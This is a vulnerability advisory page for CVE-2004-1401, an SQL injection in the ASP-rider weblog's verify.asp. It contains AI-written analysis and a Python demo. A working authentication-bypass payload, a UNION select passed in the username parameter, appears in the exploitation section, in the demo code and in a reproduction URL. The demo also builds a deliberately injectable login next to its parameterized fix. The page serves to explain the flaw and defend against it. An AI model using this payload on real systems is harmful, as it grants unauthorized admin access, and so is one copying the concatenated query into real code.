VYPR
Unrated severity · NVD Advisory · Published Dec 31, 2004 · Updated Apr 16, 2026

CVE-2004-1401

Description

SQL injection in ASP-rider verify.asp allows unauthenticated remote attackers to bypass authentication and execute arbitrary SQL statements.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

CVE-2004-1401 is an SQL injection vulnerability (CWE-89) in the verify.asp file within the blogadmin folder of ASP-rider, a Farsi weblog application written in ASP. The username parameter is placed into an SQL query without sanitization or parameterization, so an attacker can inject arbitrary SQL statements. The advisory does not enumerate affected version numbers, and the CPE entry on this page covers all versions [1].

Exploitation

An attacker can exploit this vulnerability remotely and without authentication by sending a crafted HTTP request to the verify.asp page. The advisory [1] gives a proof of concept: requesting /blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1 bypasses the login and grants administrative access. This is a UNION-based injection, not a blind one: the leading single quote closes the username string literal, the UNION SELECT appends a fabricated row of eight constants, and the trailing where ''=' re-balances the closing quote that the application itself adds. A UNION only succeeds when the column counts match, so the eight constants imply that tbl_users has eight columns; and because the attacker submits password=1 to match the constant 1 in the fabricated row, the PoC suggests that verify.asp looks the user up by username and then compares the returned password column against the submitted value in script code rather than in the WHERE clause.

Impact

Successful exploitation allows an unauthenticated attacker to bypass authentication entirely and gain administrative access to the ASP-rider weblog. This can lead to full compromise of the application, including unauthorized modification of content, disclosure of sensitive data, and further exploitation of the server [1].

Mitigation

The vendor reportedly patched the vulnerability at the time of disclosure, according to the 2004 advisory [1], although no patch artifact is linked on this page. Users should ensure they are running a version of ASP-rider that includes the fix or, where the source is available, replace the concatenated query in verify.asp with a parameterized one. No further official updates are expected, as the software is likely end-of-life. This CVE is not listed in the CISA Known Exploited Vulnerabilities catalog.

AI Insight generated on May 24, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

2
  • cpe:2.3:a:asp-rider:asp-rider:*:*:*:*:*:*:*:*
  • (no CPE)

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"Missing input sanitization in the username parameter of verify.asp allows SQL injection."

Attack vector

An attacker sends an HTTP request to `verify.asp` with a crafted `username` parameter containing a SQL injection payload [ref_id=1]. The proof-of-concept shows a `union select` injection that bypasses authentication entirely, allowing the attacker to log in as any user without knowing the correct password [ref_id=1]. The attack requires only network access to the web server and no prior authentication.

Affected code

The vulnerable file is `verify.asp` located in the `blogadmin` folder [ref_id=1]. This file handles authentication for the ASP-rider weblog administrator panel.

What the fix does

The advisory states the vulnerability "is already patched" but does not include the patch content or describe the specific fix [ref_id=1]. The correct remediation is to bind the `username` value as a query parameter (in classic ASP, an ADODB.Command with a declared parameter instead of a concatenated string) so that the quote and the UNION keyword in the payload are treated as data rather than SQL; escaping single quotes is a weaker fallback that only protects string contexts.
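To make the mechanics behind the Exploitation section and this fix concrete, the following is an added example, not ASP-rider code (the advisory does not publish verify.asp). It rebuilds the login logic that the PoC implies in Python against an in-memory SQLite table: a lookup by username built by string concatenation, followed by an in-code comparison of the returned password column, using an invented eight-column tbl_users schema sized to the PoC's eight constants. It then shows the same lookup with a bound parameter. The column names, sample data and function names are assumptions; SQLite stands in for whatever backend the 2004 application used, and the UNION mechanics are the same.

```python
"""
Added example (not ASP-rider code): reproduce the CVE-2004-1401
authentication bypass against an in-memory SQLite table, then show the
parameterized query that defeats it.

Assumptions (verify.asp's source is not published in the advisory):
  - tbl_users has 8 columns, because the PoC unions 8 constants
  - the login selects the row by username and compares the returned
    password column with the submitted password in script code
"""
import sqlite3

# Constructed sample schema and data; column names are invented.
SCHEMA = """
CREATE TABLE tbl_users (
    id INTEGER, username TEXT, password TEXT, email TEXT,
    fullname TEXT, role TEXT, created TEXT, active INTEGER
);
INSERT INTO tbl_users VALUES
    (1, 'admin', 's3cret-admin-pw', 'admin@example.invalid',
     'Site Admin', 'admin', '2004-01-01', 1);
"""

# Payload exactly as given in the advisory, URL-decoded.
PAYLOAD_USERNAME = "'union select 1,1,1,1,1,1,1,1 from tbl_users where ''='"
PAYLOAD_PASSWORD = "1"

PASSWORD_COLUMN = 2  # index of the password column in the constructed schema


def _connect():
    """Fresh in-memory database seeded with the constructed schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def rendered_query(username):
    """The SQL text that the vulnerable concatenation actually sends."""
    return "SELECT * FROM tbl_users WHERE username='" + username + "'"


def login_vulnerable(username, password):
    """Assumed verify.asp logic: concatenated lookup by username, then an
    in-code comparison of the password column. With the PoC payload the
    first SELECT matches nothing and the UNION supplies a row of eight
    1s, so the 'password' column is 1 and password=1 matches."""
    conn = _connect()
    row = conn.execute(rendered_query(username)).fetchone()
    conn.close()
    if row is None:
        return False
    return str(row[PASSWORD_COLUMN]) == password


def login_fixed(username, password):
    """Same lookup with a bound parameter: the payload is now just an
    unusual username string that matches no row."""
    conn = _connect()
    row = conn.execute(
        "SELECT * FROM tbl_users WHERE username=?", (username,)
    ).fetchone()
    conn.close()
    if row is None:
        return False
    return str(row[PASSWORD_COLUMN]) == password


if __name__ == "__main__":
    print(rendered_query(PAYLOAD_USERNAME))
    print("vulnerable, PoC payload:", login_vulnerable(PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("fixed, PoC payload:     ", login_fixed(PAYLOAD_USERNAME, PAYLOAD_PASSWORD))
    print("fixed, real credentials:", login_fixed("admin", "s3cret-admin-pw"))
```

Running it prints the rendered query with the injected UNION, shows login_vulnerable accepting the advisory's payload with password 1, and shows login_fixed rejecting that payload while still accepting the real credentials. The parameterized version never interpolates the attacker's quote into SQL text, which is why the trailing where ''=' trick has nothing to re-balance.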

Preconditions

  • network: The target must be running ASP-rider weblog software with the vulnerable verify.asp accessible.
  • auth: No authentication is required; the attacker can reach the login page anonymously.

Reproduction

Navigate to `http://www.site.com/weblog/blogadmin/verify.asp?username='union select 1,1,1,1,1,1,1,1 from tbl_users where ''='&password=1` to bypass authentication and log in to the administrator page [ref_id=1].

Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

4

News mentions

0

No linked articles in our index yet.